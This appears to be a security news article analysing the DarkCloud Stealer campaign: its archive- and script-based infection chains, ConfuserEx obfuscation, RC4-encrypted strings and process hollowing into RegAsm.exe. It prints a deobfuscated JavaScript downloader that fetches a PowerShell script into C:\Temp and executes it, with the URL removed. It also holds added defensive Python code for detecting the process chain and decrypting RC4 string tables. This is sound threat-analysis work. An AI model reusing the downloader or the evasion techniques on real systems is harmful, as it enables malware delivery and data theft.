DarkCloud Stealer Employs New Infection Chain and ConfuserEx-Based Obfuscation

Posted on August 9, 2025 by CWS

A sophisticated information-stealing malware campaign has emerged, using advanced obfuscation techniques and multiple infection vectors to evade conventional security controls.

The DarkCloud Stealer, first documented in recent threat intelligence reports, represents a significant evolution in cybercriminal tactics, employing a complex multi-stage delivery mechanism that begins with seemingly innocuous archive files and culminates in the deployment of a heavily obfuscated Visual Basic 6 payload.

The malware operators have developed three distinct infection pathways, each designed to maximize the likelihood of successful system compromise.

These include JavaScript-initiated chains that download PowerShell scripts, 7Z archives containing Windows Script Files with obfuscated JScript code, and TAR archives that serve as alternative entry points.

Each vector demonstrates refined social engineering, often masquerading as legitimate business documents or software updates to bypass user suspicion.

Recent campaigns observed since April 2025 indicate the threat actors have significantly refined their approach, shifting away from previously documented AutoIt-based implementations toward more complex .NET-based obfuscation frameworks.

Palo Alto Networks researchers identified this shift as part of a broader trend among cybercriminals to adopt enterprise-grade development tools for malicious purposes, making detection and analysis considerably more difficult for security teams.

The malware's impact extends beyond traditional data theft, incorporating advanced persistence mechanisms and anti-analysis features that allow it to operate undetected for extended periods.

The campaign's infrastructure, including command-and-control servers hosting multiple malicious PowerShell scripts, suggests a well-resourced operation with significant planning and development investment.

ConfuserEx Obfuscation and Process Injection Mechanics

The technical sophistication of DarkCloud Stealer becomes apparent in its implementation of ConfuserEx-based obfuscation, a legitimate .NET application protector repurposed for malicious use.

Infection chain of recent DarkCloud attacks (Source – Palo Alto Networks)

The malware employs multiple layers of protection, including anti-tampering measures, symbol renaming, and control flow obfuscation that transforms readable code into incomprehensible instruction sequences.

The deobfuscated JavaScript downloader reveals the initial infection mechanism:

// Target path for the downloaded script: a random name under C:\Temp
// (the backslashes were lost in the published excerpt and are restored here)
var rDFG = "C:\\Temp\\" + RandomName() + ".ps1";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var shell = new ActiveXObject("WScript.Shell");
var http = new ActiveXObject("MSXML2.XMLHTTP");

// The download URL was removed from the published excerpt; placeholder kept here
if (Dwnld("<URL removed in source>", rDFG)) {
    ExePSh(rDFG);   // hand the .ps1 to PowerShell
}

This script downloads PowerShell payloads from open directory servers, creating randomly named files in the system's temporary directory.

The subsequent PowerShell script contains Base64-encoded and AES-encrypted data that, when decrypted, reveals another executable protected by ConfuserEx's anti-tampering features.

The final stage employs process hollowing, injecting the decrypted VB6 payload named "holographies.exe" into RegAsm.exe, a legitimate .NET Framework utility.

This technique allows the malware to execute within the context of a trusted process, effectively bypassing many endpoint security solutions.
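The chain described above (script host writes a random .ps1 into the temp directory, PowerShell runs it, RegAsm.exe is then started as a hollowing host) leaves a recognisable parent/child trail in process-creation telemetry. The following is an added example, not code from the article or from Palo Alto Networks: a small process-tree heuristic run over constructed Sysmon-style records. The record fields, process IDs and command lines are invented for the demo; real data would come from Sysmon Event ID 1, an EDR, or Windows 4688 with command-line logging enabled.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (field names are an assumption for this demo)."""
    pid: int
    ppid: int
    image: str      # full path of the newly created process
    cmdline: str    # command line as logged


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# A .ps1 sitting in a directory named "temp" (case-insensitive), e.g. C:\Temp\abc.ps1
TEMP_PS1 = re.compile(r"(?i)\\temp\\\S+\.ps1")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_chain(events):
    """Return (rule_name, pid) findings for the two stages of the chain.

    Stage 1: a Windows script host launching PowerShell on a .ps1 in a temp directory.
    Stage 2: RegAsm.exe spawned by PowerShell with no assembly (.dll) argument;
             RegAsm normally registers an assembly, so an argument-less launch
             under PowerShell is a reasonable hollowing candidate.
    """
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        name = basename(e.image)
        pname = basename(parent.image) if parent else ""
        if name == "powershell.exe" and pname in SCRIPT_HOSTS and TEMP_PS1.search(e.cmdline):
            findings.append(("script_host_to_temp_ps1", e.pid))
        if name == "regasm.exe" and pname == "powershell.exe":
            if not re.search(r"(?i)\.dll", e.cmdline):
                findings.append(("hollow_candidate_regasm", e.pid))
    return findings


# Constructed sample telemetry: one malicious chain and one benign RegAsm use.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\wscript.exe",
              'wscript.exe "C:\\Users\\u\\Downloads\\invoice.js"'),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -File C:\\Temp\\kq8f2z.ps1"),
    ProcEvent(400, 300, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"),
    # Benign: an administrator registering a COM-visible assembly from cmd.exe
    ProcEvent(500, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(600, 500, r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
              r"RegAsm.exe C:\app\Interop.dll /codebase"),
]


if __name__ == "__main__":
    for rule, pid in find_chain(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Only the wscript -> powershell -> RegAsm branch is flagged; the cmd.exe -> RegAsm registration with a .dll argument is left alone. In production the parent check should also tolerate pwsh.exe and the RegAsm rule should be paired with an image-load or memory-region signal from the EDR, since an argument-less RegAsm launch on its own is only a candidate.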

Critical strings within the payload use RC4 stream cipher encryption with unique keys, further complicating static analysis efforts and demonstrating the authors' commitment to evasion.
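Because RC4 is symmetric, the routine that protected the strings is the same one an analyst runs to recover them once the per-string key and ciphertext have been pulled from the binary. The block below is an added example, not the article's or Palo Alto Networks' code, and the string-table layout (a key stored next to each ciphertext) and the sample strings are constructed for the demo; the page does not describe how DarkCloud actually stores its keys.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):                            # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                               # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def decrypt_string_table(table):
    """table: list of (key, ciphertext) pairs, one unique key per string.

    Returns the recovered strings; undecodable bytes are replaced rather than
    raising, so a wrong key yields garbage instead of aborting the sweep.
    """
    return [rc4(k, c).decode("utf-8", errors="replace") for k, c in table]


# Constructed sample: build a table the way a protector might (unique key per
# string), then recover it. The plaintexts are names that appear in the article.
PLAINTEXTS = [b"C:\\Temp\\holographies.exe", b"RegAsm.exe", b"example config string"]
KEYS = [b"k1-a7f3", b"k2-91cc", b"k3-0e4d"]
SAMPLE_TABLE = [(k, rc4(k, p)) for k, p in zip(KEYS, PLAINTEXTS)]


if __name__ == "__main__":
    for k, c in SAMPLE_TABLE:
        print(f"key={k!r} ct={c.hex()}")
    print(decrypt_string_table(SAMPLE_TABLE))
```

With the unique-key scheme each string has to be located and decrypted separately, which is why bulk string extraction against the packed sample returns nothing useful; the work is in finding where the key and blob live, and the cipher itself is trivial once they are known.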

